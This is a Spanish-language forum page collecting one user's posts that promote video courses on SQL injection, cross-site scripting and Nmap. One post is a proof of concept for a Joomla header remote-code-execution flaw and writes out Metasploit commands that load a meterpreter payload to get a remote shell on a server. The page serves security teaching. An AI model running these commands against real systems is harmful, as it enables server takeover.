Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Franciscodc

#1
Hola a todos vuelvo con otro curso, una vez terminado el curso de XSS Cross Site Scripting y el Curso de Nmap he decidido iniciar con uno nuevo "Curso de SQL" y aqui se los dejo

Curso SQL INJECTION: Todo sobre SQL Injection - Clase 0



Curso SQL INJECTION: Identificando SQL Injection & Uso de Dorks - Clase 1



Curso SQL INJECTION: LOGIN FORM BYPASS - Clase 2




TEMAS RESTANTES (Este temario esta sujeto a cambios.)

Clase 3: LOGIN FORM BYPASS #2 - SQL INJECTION
Clase 4: DETECTAR NUMERO DE COLUMNAS CON ENTEROS - SQL INJECTION
Clase 5: DETECTAR NUMERO DE COLUMNAS CON CADENAS - SQL INJECTION
CLASE 6: OBTENER INFORMACIÓN DE BASE DE DATOS - SQL INJECTION
CLASE 7: DETECTAR BASES DE DATOS, COLUMNAS y TABLAS - SQL INJECTION
CLASE 8: EXTRAER DATOS ESPECÍFICOS DE BASE DE DATOS - SQL INJECTION
Clase 9: INYECCION SQL CON DROP DOWN BOX & BURP SUITE - SQL INJECTION
Clase 10: INYECCIÓN SQL CON BROWSER USER AGENT & BURP SUITE - SQL INJECTION
Clase 11: INYECCIÓN SQL CON COOKIES - SQL INJECTION
Clase 12: INYECCION SQL CON BASE 64 - SQL INJECTION
Clase 13: WAF BYPASS CON INLINE COMMENTS - SQL INJECTION
CLASE 14: WAF BYPASS CON FUNCIÓN CHAR - SQL INJECTION
Clase 15: WAF BYPASS CON URL & HEX ENCODING - SQL INJECTION
Clase 16: SQL INJECTION CON HAVIJ - SQL INJECTION
Clase 17: SQL INJECTION CON SQLMAP - SQL INJECTION
Clase 18: SQL INJECTION CON SQLMAP #2 - SQL INJECTION
CLASE 19: BLIND BASED INJECTION - SQL INJECTION
Clase 20: TIME BASED INJECTION - SQL INJECTION
Clase 21: INYECCION A GESTOR POSTGRESQL - SQL INJECTION
Clase 22: INYECCION A GESTOR MSSQL - SQL INJECTION
#2
Hola Gente recien me registre en este foro y este es mi tercer post. En esta ocacion por parte de la "OHCS" les traigo la prueba de concepto en la cual aprovechamos la vulnerabilidad de ejecucion remota de joomla, la cual permite ejecutar codigo por medio de las cabeceras y asi poder generar una shell remota que nos dara acceso y control al servidor.

Versiones de Joomla Afectadas : 1.5.0 a 3.4.5
Versiones de PHP Afectadas : Anteriores a 5.4.45

*****************************************************LINKS DESCARGAS NECESARIAS *****************************************************
Joomla Metasploit POC : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Joomla 3.4.5 : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Xampp server con php 5.4.4: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


*************************************************************Comandos Utilizados *********************************************************
use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.0.5
set PAYLOAD php/meterpreter/bind_tcp
set LHOST 192.168.6.174
exploit


Aqui el POC:
#3
Hola Gente de Underc0de aqui de nuevo con otro aporte por parte de la OHCS "Organizacion Hispana de Ciber Seguridad", En este curso se ve las bases del cross site scripting y meotodos avanzados para ofuscar los payloads.

VIDEO WIKI : TODO SOBRE XSS - CLASE # 0




CURSO XSS: Inyeccion Basica - Clase #1




CURSO XSS: Evasion Basica de Flitros (Ofuscando el Payload) -Clase # 2




CURSO XSS: Inyeccion Por Error (IMG ONERROR)- Clase #3




CURSO XSS: Jugando con el OutPut - Clase #4



CURSO XSS: Ofuscando Payload con string.fromCharCode - Clase #5



Curso XSS: Bypass de PHP echo - Clase #6



Curso XSS: Bypass htmlentities & PHP_SELF - Clase #7



Curso XSS: DOM-based XSS - Clase #8



Curso XSS: Session Hijacking - Clase #9



Curso XSS: Tamper Data Injection - Clase #10



Curso XSS: Website Defacement InnerHTML - Clase #11




Curso XSS: Owasp Cheat Sheet / Xenotix Framework - Clase #12



EL CURSO FINALIZO - Continuamos con el de NMAP : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PROXIMOS CURSOS :

XENOTIX FRAMEWORK
ARMITAGE
COBALT STRIKE
WIRE SHARK
SQLMAP
Aircrack Package
Burp suite
FootPrinting
FingerPrinting
Criptografia

Entre otros....


#4
Hola Gente este es mi primer post y quiero compartirles el curso que se esta llevando a acabo por parte de la "Organizacion Hispana de Ciber seguridad" sobre Nmap el cual se llevara a fondo, aquí los videos y espero se suscriban a mi canal :)

Clase #0 - Todo sobre Nmap



Clase #1 - Tecnicas Basicas de Escaneo



Clase #2 - Opciones de Salida



Clase #3 - Opciones de Escaneo de Puertos



Clase #4 - Opciones Avanzadas de Escaneo




Clase #5 - Opciones de Detección de Versiones



Clase #6 - Opciones de Descubrimiento



Clase #7 - Evasión de Firewalls



Clase #8 - Nmap Scripting Engine (NSE)



Clase #9 - Interfaz Gráfica de Nmap (Zenmap) - Se esta subiendo



Clase #10 - Top 10 apariciones de Nmap en Películas. - Por grabarse



Y aun falta 1 video relacionado a este curso por hacer.